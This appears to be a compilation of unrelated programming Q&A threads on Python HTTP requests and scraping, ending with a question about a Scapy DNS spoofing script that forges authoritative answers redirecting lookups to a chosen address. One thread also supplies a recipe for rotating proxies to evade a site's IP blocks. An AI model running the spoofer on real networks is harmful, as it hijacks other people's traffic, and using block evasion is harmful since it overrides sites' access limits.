import requests
from bs4 import BeautifulSoup

url = "http://www.whatsmyip.org"
for x in range(0, 5):
    response = requests.get(url).content
    soup = BeautifulSoup(response, 'lxml')
    result = soup.findAll('h1')
    for each in result:
        print(each.text)
        break
Output:
Your IP Address is 19.12.86.57
Your IP Address is 151.138.87.69
Your IP Address is 108.206.165.11
Your IP Address is 148.84.71.226
Your IP Address is 50.201.205.131
When I run this code, I get a different IP address every time instead of my public IP. Can anyone explain?
I think it's not about Python, but about whatsmyip.org ;) They probably have some method to detect and discourage scripted requests.
I tried some other websites and always got my public IP. Example:
url = "https://www.iplocation.net"
for x in range(0,5):
response = requests.get(url).content
soup = BeautifulSoup(response, 'html.parser')
result = soup.findAll('span')
for each in result:
try:
if each.text[0] in '01234567890':
print(each.text)
break
except:
continue
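If the goal is just to read the public IP, a plain-text API avoids HTML parsing (and any anti-scripting behaviour) altogether. A minimal sketch, assuming the free api.ipify.org endpoint is acceptable:

import requests

# api.ipify.org returns the caller's public IP as plain text
ip = requests.get('https://api.ipify.org').text
print('Your IP Address is', ip)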
Link to the website: https://awg.wd3.myworkdayjobs.com/AW/job/Lincoln/Business-Analyst_R15025-2
How do I get the location, job type, and salary details from this website?
Can you please help me locate the above-mentioned details in the HTML using BeautifulSoup?
The site uses a backend API to deliver the info. If you look at your browser's Developer Tools > Network > Fetch/XHR and refresh the page, you'll see the data load as JSON from a request with a URL similar to the one you posted.
So if we edit your URL to match the backend API URL, we can hit it and parse the JSON. Unfortunately the pay amount is buried in some HTML within the JSON, so we have to pull it out with BeautifulSoup and a bit of regex to match the £###,### pattern.
import requests
from bs4 import BeautifulSoup
import re
url = 'https://awg.wd3.myworkdayjobs.com/AW/job/Lincoln/Business-Analyst_R15025-2'
search = 'https://awg.wd3.myworkdayjobs.com/wday/cxs/awg/AW/'+url.split('AW')[-1] #api endpoint from Developer Tools
data = requests.get(search).json()
posted = data['jobPostingInfo']['startDate']
location = data['jobPostingInfo']['location']
title = data['jobPostingInfo']['title']
desc = data['jobPostingInfo']['jobDescription']
soup = BeautifulSoup(desc,'html.parser')
pay_text = soup.text
sterling = [x[0] for x in re.findall(r'(£[0-9]+(,[0-9]+)?)', pay_text)][0]  # get any £###,### type text
final = {
    'title': title,
    'posted': posted,
    'location': location,
    'pay': sterling
}
print(final)
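Running this prints a dict with the title, posted date, location and pay pulled from the JSON; note that the regex step only finds the salary if it appears in the job description as a £###,### figure.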
I am using relatively cookie-cutter code to asynchronously request the HTML from a few hundred URLs that I scraped with another piece of code. The code works perfectly.
Unfortunately, this is causing my IP to be blocked due to the high number of requests.
My thought is to write some code to grab some proxy IP addresses, put them in a list, and cycle through them randomly as the requests are sent. Assuming I have no problem creating this list, I am having trouble conceptualising how to splice the random rotation of these proxy IPs into my asynchronous request code. This is my code so far:
import asyncio
import aiohttp

async def download_file(url):
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as resp:
            content = await resp.read()
            return content

async def write_file(n, content):
    filename = f'sync_{n}.html'
    with open(filename, 'wb') as f:
        f.write(content)

async def scrape_task(n, url):
    content = await download_file(url)
    await write_file(n, content)

async def main():
    tasks = []
    for n, url in enumerate(open('links.txt').readlines()):
        tasks.append(scrape_task(n, url))
    await asyncio.wait(tasks)

if __name__ == '__main__':
    asyncio.run(main())
I am thinking that I need to put:
conn = aiohttp.TCPConnector(local_addr=(x, 0), loop=loop)
async with aiohttp.ClientSession(connector=conn) as session:
...
as the second and third lines of my code, where x is one of the random IP addresses from a list defined earlier. How would I go about doing this? I am unsure whether placing the whole thing in a simple synchronous loop would defeat the purpose of using asynchronous requests.
If there is a simpler solution to the problem of being blocked from a website for rapid-fire requests, that would be very helpful too. Please note I am very new to coding.
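One way to rotate proxies without giving up the asynchronous design is to pick a proxy per request and pass it to session.get() through aiohttp's proxy argument (TCPConnector's local_addr only binds a local network interface; it does not route traffic through a proxy). Below is a minimal sketch under the assumption that PROXIES contains working HTTP proxy URLs; the addresses shown are placeholders:

import asyncio
import random
import aiohttp

# Placeholder proxy list -- replace with real, working HTTP proxies.
PROXIES = [
    'http://203.0.113.10:8080',
    'http://203.0.113.11:8080',
]

async def download_file(session, url):
    proxy = random.choice(PROXIES)  # pick a proxy at random for each request
    async with session.get(url, proxy=proxy) as resp:
        return await resp.read()

async def scrape_task(session, n, url):
    content = await download_file(session, url)
    with open(f'sync_{n}.html', 'wb') as f:
        f.write(content)

async def main():
    async with aiohttp.ClientSession() as session:  # one shared session for all requests
        urls = [line.strip() for line in open('links.txt')]
        await asyncio.gather(*(scrape_task(session, n, u) for n, u in enumerate(urls)))

if __name__ == '__main__':
    asyncio.run(main())

Note that aiohttp talks to HTTP proxies natively; SOCKS proxies need an extra connector package such as aiohttp-socks.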
I'm trying to send data to Google Forms directly (without an external service like IFTTT) using an ESP8266 with MicroPython. I've already used IFTTT, but at this point it is not useful for me: I need a sampling rate of 100 Hz or more, and as you know this exceeds IFTTT's usage limit. I've tried building a RAM buffer, but I got an error saying the buffer exceeded the RAM size (4 MB), so that's why I'm trying to send directly.
After trying for some time I got it working partially. I say "partially" because I have to do a random GET request after the POST request; I don't know why it works, but it works (this way I can send data to Google Forms roughly every second, or maybe less). I guess the problem is that the ESP8266 can't close the connection with Google Forms and gets stuck when it tries to do a new POST request. If that is the problem, I don't know how to fix it another way; any suggestions? The complete code is here:
ssid = 'my_network'
password = 'my_password'

import urequests

def do_connect():
    import network
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print('connecting to network...')
        sta_if.active(True)
        sta_if.connect(ssid, password)
        while not sta_if.isconnected():
            pass
    print('network config:', sta_if.ifconfig())

def main():
    do_connect()
    print("CONNECTED")
    url = 'url_of_my_google_form'
    form_data = 'entry.61639300=example'  # have to change the entry
    user_agent = {'Content-Type': 'application/x-www-form-urlencoded'}
    while True:
        response = urequests.post(url, data=form_data, headers=user_agent)
        print("DATA HAVE BEEN SENT")
        response.close
        print("TRYING TO SEND ANOTHER ONE...")
        response = urequests.get("http://micropython.org/ks/test.html")  # <------ RANDOM URL, I DON'T KNOW WHY THIS CODE WORKS CORRECTLY IN THIS WAY
        print("RANDOM GET:")
        print(response.text)
        response.close

if __name__ == '__main__':
    main()
Thank you for your time, guys. I also tried the code below before, but it DOESN'T WORK. Without the random GET request, it gets stuck after posting once or twice:
while True:
    response = urequests.post(url, data=form_data, headers=user_agent)
    print("DATA HAVE BEEN SENT")
    response.close
    print("TRYING TO SEND ANOTHER ONE...")
Shouldn't it be response.close() (with brackets)? 🤔
Without the brackets you merely reference the close method as an attribute instead of calling it, so the connection is never actually closed. This can lead to running out of memory.
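For illustration, here is the posting loop from the question with the connection actually closed after each request (a minimal sketch of the fix; url, form_data and user_agent are as defined above):

while True:
    response = urequests.post(url, data=form_data, headers=user_agent)
    print("DATA HAVE BEEN SENT")
    response.close()  # call the method so the socket is actually released
    print("TRYING TO SEND ANOTHER ONE...")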
I am trying to use Python to find the final redirected URL for a given URL. I tried various solutions from Stack Overflow answers, but nothing worked for me; I only get the original URL back.
To be specific, I tried the requests, urllib2 and urlparse libraries and none of them worked as they should. Here is some of the code I tried:
Solution 1:
import requests

s = requests.session()
r = s.post('https://www.boots.com/search/10055096', allow_redirects=True)
print(r.history)
print(r.history[1].url)
Result:
[<Response [301]>, <Response [302]>]
https://www.boots.com/search/10055096
Solution 2:
import urlparse
url = 'https://www.boots.com/search/10055096'
try:
    out = urlparse.parse_qs(urlparse.urlparse(url).query)['out'][0]
    print(out)
except Exception as e:
    print('not found')
Result:
not found
Solution 3:
import urllib2
def get_redirected_url(url):
    opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
    request = opener.open(url)
    return request.url
print(get_redirected_url('https://www.boots.com/search/10055096'))
Result:
HTTPError: HTTP Error 302: The HTTP server returned a redirect error that would lead to an infinite loop.
The last 30x error message was:
Found
The expected URL below is the final redirected page, and that is what I want to return.
Original URL: https://www.boots.com/search/10055096
Expected URL: https://www.boots.com/gillette-fusion5-razor-blades-4pk-10055096
Solution #1 was the closest one. At least it returned two responses, but the second response wasn't the final page; judging by its content, it looks like a loading page.
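For ordinary HTTP (3xx) redirects, requests follows them automatically and exposes the final address as r.url, so a sketch like the one below would normally be enough; as the answer below explains, though, this particular site performs its last hop with JavaScript, which requests cannot execute:

import requests

r = requests.get('https://www.boots.com/search/10055096', allow_redirects=True)
print(r.url)      # final URL after the HTTP redirects
print(r.history)  # the intermediate 3xx responses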
The first request returns an HTML file that contains JavaScript to update the page, and requests does not execute JavaScript. You can find the updated link with:
import requests
from bs4 import BeautifulSoup
import re

r = requests.get('https://www.boots.com/search/10055096')
soup = BeautifulSoup(r.content, 'html.parser')
# grab the contents of the <script> that follows the search box input
reg = soup.find('input', id='searchBoxText').findNext('script').contents[0]
# pull the first http(s)://... URL out of the script text
print(re.search(r'ht[\w\://\.-]+', reg).group())
I know the structure of a DNS resource record section, but I'm completely lost when reading the source code of this DNS spoof plugin:
from scapy.all import *

def dns_spoof(pkt):
    redirect_to = '172.16.1.63'
    if pkt.haslayer(DNSQR):  # DNS question record
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                      UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                      DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, qr=1,
                          an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=redirect_to))
        send(spoofed_pkt)
        print('Sent:', spoofed_pkt.summary())

sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)
What are the differences between the QD and AN resource records, and why do we have to use qd in this packet?
The qd section is the question record sent by the client, and Scapy represents it with the DNSQR class; the an section carries the answer resource records (DNSRR). Keeping them in separate fields makes it easy to tell the question apart from the answer and other RR sections. The spoofed reply copies the client's qd back unchanged so the forged answer matches the original question.
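To make the distinction concrete, here is a small self-contained sketch (the name example.com and the address 1.2.3.4 are made up) that builds a query and a matching answer with Scapy and shows where qd and an live:

from scapy.all import DNS, DNSQR, DNSRR

# qd: the question record -- what the client asked for (a DNSQR)
query = DNS(rd=1, qd=DNSQR(qname='example.com', qtype='A'))

# an: the answer record(s) -- what the server returns (DNSRR entries);
# the reply echoes the original qd and sets qr=1 to mark it as a response
reply = DNS(id=query.id, qr=1, aa=1, qd=query.qd,
            an=DNSRR(rrname=query.qd.qname, ttl=10, rdata='1.2.3.4'))

print(query.summary())   # e.g. a "DNS Qry" line for example.com
print(reply.summary())   # e.g. a "DNS Ans" line for 1.2.3.4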